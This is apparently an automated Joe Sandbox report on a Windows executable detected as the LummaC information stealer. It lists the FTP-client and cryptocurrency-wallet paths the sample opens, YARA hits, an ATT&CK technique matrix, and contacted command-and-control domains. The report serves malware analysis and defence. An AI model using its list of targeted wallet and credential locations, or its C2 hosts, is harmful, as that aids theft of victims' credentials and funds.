Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior

Source: Yara match	File source: 00000000.00000003.2431557756.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: H1iOI9vWfh.exe PID: 7024, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 0.2.H1iOI9vWfh.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.H1iOI9vWfh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.H1iOI9vWfh.exe.b10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.H1iOI9vWfh.exe.b10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2343688339.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: H1iOI9vWfh.exe PID: 7024, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Virtualization/Sandbox Evasion	2 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	41 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	2 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	22 Software Packing	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
H1iOI9vWfh.exe	36%	Virustotal		Browse
H1iOI9vWfh.exe	47%	ReversingLabs	Win32.Trojan.AceCrypter
H1iOI9vWfh.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://store.steampowered	0%	Avira URL Cloud	safe
https://checkout.steampow~	0%	Avira URL Cloud	safe
https://lev-tolstoi.com/apij?Vc	100%	Avira URL Cloud	malware
https://steambroadcast-test.akamaizedN	0%	Avira URL Cloud	safe
https://login.steamp.	0%	Avira URL Cloud	safe
https://lev-tolstoi.com/api1?oc%	100%	Avira URL Cloud	malware
https://community.fastly.steamsta.	0%	Avira URL Cloud	safe
https://lev-tolstoi.com/apim	100%	Avira URL Cloud	malware
https://help.stn	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	23.55.153.106	true	false	high
lev-tolstoi.com	104.21.66.86	true	false	high
cashfuzysao.buzz	unknown	unknown	false	high
scentniej.buzz	unknown	unknown	false	high
inherineau.buzz	unknown	unknown	false	high
prisonyfork.buzz	unknown	unknown	false	high
rebuildeso.buzz	unknown	unknown	false	high
appliacnesot.buzz	unknown	unknown	false	high
hummskitnj.buzz	unknown	unknown	false	high
screwamusresz.buzz	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
scentniej.buzz	false	high
https://steamcommunity.com/profiles/76561199724331900	false	high
rebuildeso.buzz	false	high
appliacnesot.buzz	false	high
screwamusresz.buzz	false	high
cashfuzysao.buzz	false	high
inherineau.buzz	false	high
https://lev-tolstoi.com/api	false	high
hummskitnj.buzz	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	H1iOI9vWfh.exe, 00000000.00000003.2432611733.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432536632.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432739625.00000000030AE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steambroadcast-test.akamaizedN	H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	H1iOI9vWfh.exe, 00000000.00000003.2432611733.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432536632.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432739625.00000000030AE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/?subsection=broadcasts	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/subscriber_agreement/	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/recaptc	H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.valvesoftware.com/legal.htm	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com	H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered	H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://checkout.steampow~	H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com	H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://s.ytimg.com;	H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/	H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steam.tv/	H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/apij?Vc	H1iOI9vWfh.exe, 00000000.00000003.2506419676.0000000003063000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://lev-tolstoi.com/	H1iOI9vWfh.exe, 00000000.00000003.2428659304.0000000000C9A000.00000004.00000020.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000002.2616110250.0000000003055000.00000004.00000800.00020000.00000000.sdmp	false		high
http://store.steampowered.com/privacy_agreement/	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/points/shop/	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	H1iOI9vWfh.exe, 00000000.00000003.2432611733.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432536632.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432739625.00000000030AE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	H1iOI9vWfh.exe, 00000000.00000003.2479957216.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	H1iOI9vWfh.exe, 00000000.00000003.2479957216.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sketchfab.com	H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	H1iOI9vWfh.exe, 00000000.00000003.2432611733.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432536632.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432739625.00000000030AE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900/inventory/	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	H1iOI9vWfh.exe, 00000000.00000003.2481098837.0000000003343000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com/	H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/privacy_agreement/	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.steamp.	H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	false		high
https://checkout.steampowered.com/	H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/about/	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/my/wishlist/	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/news/	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	H1iOI9vWfh.exe, 00000000.00000003.2432611733.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432536632.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432739625.00000000030AE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/apim	H1iOI9vWfh.exe, 00000000.00000002.2616110250.0000000003055000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://store.steampowered.com/subscriber_agreement/	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://recaptcha.net/recaptcha/;	H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/discussions/	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/api1?oc%	H1iOI9vWfh.exe, 00000000.00000003.2479722797.0000000003063000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2506419676.0000000003063000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2479385412.0000000003061000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2480204785.0000000003061000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000002.2616171752.0000000003063000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2506606942.0000000003063000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/stats/	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://medal.tv	H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/steam_refunds/	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	H1iOI9vWfh.exe, 00000000.00000003.2479957216.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	H1iOI9vWfh.exe, 00000000.00000003.2479957216.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	H1iOI9vWfh.exe, 00000000.00000003.2432611733.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432536632.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432739625.00000000030AE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/workshop/	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.steampowered.com/	H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	H1iOI9vWfh.exe, 00000000.00000003.2481098837.0000000003343000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/legal/	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamsta.	H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	H1iOI9vWfh.exe, 00000000.00000003.2432611733.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432536632.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432739625.00000000030AE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://help.stn	H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://recaptcha.net	H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.6.dr	false		high
https://store.steampowered.com/	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://127.0.0.1:27060	H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	false		high
https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.66.86	lev-tolstoi.com	United States		13335	CLOUDFLARENETUS	false
23.55.153.106	steamcommunity.com	United States		20940	AKAMAI-ASN1EU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581607
Start date and time:	2024-12-28 09:47:31 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
